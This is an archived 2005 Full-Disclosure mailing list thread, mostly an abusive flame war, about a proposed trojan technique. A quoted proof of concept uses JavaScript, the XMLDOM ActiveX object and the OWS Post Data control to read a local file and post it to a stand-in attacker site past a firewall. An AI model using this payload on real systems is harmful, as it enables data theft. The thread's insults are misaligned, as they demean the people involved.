lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Dec 22 18:06:58 2005 From: testdrive6 at gmail.com (Test Drive) Subject: new attack technique? using JavaScript+XML+OWSPost Data On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote: > > You surely must be a clone of Gaurav !! Ain't you ?? > > name pipe [mailto:namepipe@...il.com] brazenly wrote: > >> Before flaming others just look at urself. wtf u do moron debasis , > sell nessus reports for 5K, without even removing false +ives ?? > > lol !! Is that what you do ?? > No u do that .. everone knows abt it. >> This is ur elite resume -> > http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical > Hacker ???? omfg. > > Certainly, like many others I was also one time looking for a good break > and moreover I just wanted to have a web based copy on a security jobs > site. I am glad that my resume made you laugh. > >> You trying to be next fadia or wat ? > > I never have to become like someone else.... I'm pretty much happy with my > own identity. > >> Do you want me to post ur lame Firewall bypass vulnerabilities links > which have been already founded years before? > > Is that the one that one, which many securitysites released as an advisory > including the vendor himself. Why you, infact I wud be glad to post it > again. > http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html > > Also don't forget to refer those CVE, BID, FrSIRT, OSVDB, Secunia, > Securiteam, ISS X-Force, US-CERT reference link on my site. They might help > you clarify your doubt. > Are u talking abt the WGA check, which some1 posted abt 2 week ago. >> Basically u are an asshole. So stfu. > *****STFU**** ** Is this statement phrased using both gaurav's and ur's l33t skils?? :P > > - D > > > > ------------------------------ > *From:* name pipe [mailto:namepipe@...il.com] > *Sent:* Thursday, December 22, 2005 10:54 PM > *To:* Debasis Mohanty > *Cc:* Gaurav Kumar; full-disclosure@...ts.grok.org.uk > *Subject:* Re: [Full-disclosure] new attack technique? using > JavaScript+XML+OWSPost Data > > Before flaming others just look at urself. wtf u do moron debasis , sell > nessus reports for 5K, without even removing false +ives ?? > This is ur elite resume -> > http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical > Hacker ???? omfg. You trying to be next fadia or wat ? Do you want me to > post ur lame Firewall bypass vulnerabilities links which have been already > founded years before? > > Basically u are an asshole. So stfu. > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote: > > > > Keep it up moron !! > > > > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years > > > kidder than u) > > > > Shit !! Another several years ppl has to tolerate your stupidity till > > you > > actuall _grow up_. > > > > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer > > > combination so rare ? > > > > Is this a new topic ?? I mean are you done with your firewall and some > > weired trojan design :P > > > > > > - D > > > > > > -----Original Message----- > > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav > > Kumar > > Sent: Thursday, December 22, 2005 10:23 PM > > To: Debasis Mohanty > > Cc: full-disclosure@...ts.grok.org.uk > > Subject: Re: [Full-disclosure] new attack technique? using > > JavaScript+XML+OWSPost Data > > > > typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u. > > > > On 12/22/05, Gaurav Kumar < gaurav@...urebox.org> wrote: > > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years > > > kidder than u) > > > > > > The _real_ thing is that I proved the point. > > > U told win xp will give access denied error. I proved u wrong with the > > > > > proof attached. > > > U told above technique wont work...i proved u wrong. > > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer > > > combination so rare ? > > > > > > Is that all making ur ego shattered? > > > > > > ...and u are no one to decide what should one disuss on this list. > > > > > > regards, > > > gaurav > > > > > > > > > > > > On 12/22/05, Debasis Mohanty < mail@...kingspirits.com> wrote: > > > > Kid, > > > > Although I normally don't reply to such frivilous and lame > > > > statements but your reply has seriously piss me off.. So dropping > > > > few lines, perhaps will help you grow up !! > > > > > > > > -----Original Message----- > > > > >> From: Gaurav Kumar brazenly wrote: > > > > > > > > >> Looks like u need to read again what i wrote. I didnt use the > > > > >> word > > > > 'spread'. > > > > > > > > I don't have to !! I can still remember your priceless statements > > > > [1] + [2] > > > > - > > > > > > > > [1] A Trojan has been to be placed in a system running an > > > > application [1] firewall like Zone Alarm Pro etc. > > > > > > > > [2] The target system must be having office XP and the user has to > > > > be [2] lured to view a webpage hosted by attacker. > > > > > > > > > > > > ROFL !! May be you could just ask your l33t victim to send you his > > > > passwords and other info by email :P Don't forget to send him your > > > > l33t email ID - '@ securebox.org' > > > > > > > > > > > > >> [3] Moreover, u need not know if the target system is running ZA > > > > >> or > > > > not... > > > > >> [3] "the technique works even if firewall is not installed". > > > > > > > > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt > > > > >> matter > > > > is ZA > > > > >> [4] or any other FW is running on client". > > > > > > > > Looking at statement [3] & [4], (especially the statement within > > > > double > > > > quotes) just made me believe that you don't know what your are > > > > talking about unless you want to look like an idiot. > > > > > > > > > > > > >> really? ever heard of IE exploits? > > > > > > > > Priceless !! > > > > > > > > > > > > >> Well..Exactly! i would suggest u read the 'assumptions' first, > > > > >> its an assumption that user will click yes to warning...like most > > 'normal' > > > > users do. > > > > > > > > Yet another priceless statement... Maybe you could just ask your > > > > l33t victim to click 'yes' to your l33t piece of code trying to > > > > download some l33t piece of shit which will fail to run and die like > > an > > idiot. > > > > > > > > > > > > I am sure you have enough l33t skills to strick back to keep your > > > > ego up2date however, I wud rather suggest if you have only your > > > > stupidity to share then feel free to take it offline and don't piss > > > > off everyone in this list. I would welcome you if you really want to > > > > strike back with some _serious_ technical stuff. (Note: make a note > > > > of _serious_ in the statement) > > > > > > > > - D > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of > > > > Gaurav Kumar > > > > Sent: Thursday, December 22, 2005 8:52 AM > > > > To: Debasis Mohanty > > > > Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org > > > > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack > > technique? > > > > using JavaScript+XML+OWSPost Data > > > > > > > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote: > > > > > -----Original Message----- > > > > > From: Gaurav Kumar > > > > > Sent: Wednesday, December 21, 2005 8:59 PM > > > > > To: full-disclosure@...ts.grok.org.uk > > > > > Cc: websecurity@...appsec.org > > > > > Subject: [Full-disclosure] new attack technique? using > > > > > JavaScript+XML+OWSPost Data > > > > > > > > > > 1>> A Trojan has been to be placed in a system running an > > > > > 1>> application firewall like Zone Alarm Pro etc. > > > > > > > > > > >> Assumptions: > > > > > > > > > > 2>> The target system must be having office XP and the user has to > > > > > > > 2>> be lured to view a webpage hosted by attacker. > > > > > > > > > > 3>> The Trojan can be designed to generate an xml file which will > > > > > 3>> contain the data to be sent out. The attacker will lure > > > > > the > > > > > 3>> user to visit a website hosted by him. > > > > > > > > > > Lol !! In a practical scenario, the attacker who spreads the > > > > > worm/trojans himself is not aware in the initial stage which are > > > > > the infected machines unless the trojan sends back the > > > > > machine/user info back to the attacker. Now as you have already > > > > > mentioned ZA is running then no data can be sent back to the > > > > > attacker. So the attacker is clueless > > > > which are those infected machines. > > > > > > > > Looks like u need to read again what i wrote. I didnt use the word > > 'spread'. > > > > Moreover, u need not know if the target system is running ZA or > > > > not...the technique works even if firewall is not installed. I am > > > > discussing a possible 'design' of a trojan here, doesnt matter is ZA > > > > or any other FW is running on client. > > > > > > > > > So the case of luring the user to visit the link is out of > > scope... > > > > > > > > really? ever heard of IE exploits? > > > > > > > > > > > > > > >> The site can have following HTML code- > > > > > > > > > > Now coming back to technical stuff, You are trying to access a > > > > > local file which will only be allowed if the site is in "Trusted > > > > > Sites" or "Local Intranet" or "Local Security Zone" and activex > > not > > marked safe. > > > > > The fact that *the client is also the server* is irrelevant. > > > > > > > > > > Try uploading the script to some webserver and give a html > > > > > extention; it will throw an _access denied_ error when the page > > > > > loads (even on Win XP + SP1). > > > > > > > > > > In case of any server side extention like *.asp, *.jsp etc, the > > > > > user will be prompted that an malicious component is trying to > > > > > load and ask for user permission. > > > > > > > > > > > > > > > >> <html> > > > > > >> <body> > > > > > >> The author is not responsible for any misuse, this PoC is for > > > > > >> educational purpose only. > > > > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" > > > > > >> id="exp"> > > > > > >> </object> > > > > > >> <script LANGUAGE=javascript> > > > > > >> var xmlDoc > > > > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); > > > > > >> xmlDoc.async=false ; > > > > > >> xmlDoc.load("c:\\note.xml"); > > > > > >> xmlObj=xmlDoc.documentElement; > > > > > >> var a= xmlObj.firstChild.text; > > > > > >> exp.Post(0," http://www.attackersite.com/input.asp",a)<http://www.attackersite.com/input.asp%22,a%29> > > ; > > > > > >> </script> > > > > > >> </body> > > > > > >> </html> > > > > > > > > > > > > > > > >> The above code (works well on windows XP SP2) essentials calls > > > > > >> "OWS Post Data" COM control to post the contents of note.xml > > > > > >> (generated by trojan) to attackersite.com > > > > > > > > > > IMHO, never conduct such tests in a "Intranet Zone" or "Local > > Zone" > > > > > and draw conclusion about "Internet Security Zone". > > > > > > > > > > You may also link to know about this issue - > > > > > http://support.microsoft.com/kb/317244/EN-US/ > > > > > > > > > > > > > > > >>> Essentially, the technique is breaking the basic functionality > > > > > >>> of application firewalls by using OWS Post Data as bridge for > > > > > >>> sending out the data using Javascript and XML. > > > > > > > > > > Not Exactly !! I wud rather suggest you to do a little more > > > > > research and draw any conclusion. Keep those _Security Zones_ in > > > > > mind before you post anything... > > > > > > > > Well..Exactly! i would suggest u read the 'assumptions' first, its > > > > an assumption that user will click yes to warning...like most > > 'normal' > > > > users do. > > > > > > > > > > > > > > > - D > > > > > > > > > > > > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051222/0075e00a/attachment-0001.html
Powered by blists - more mailing lists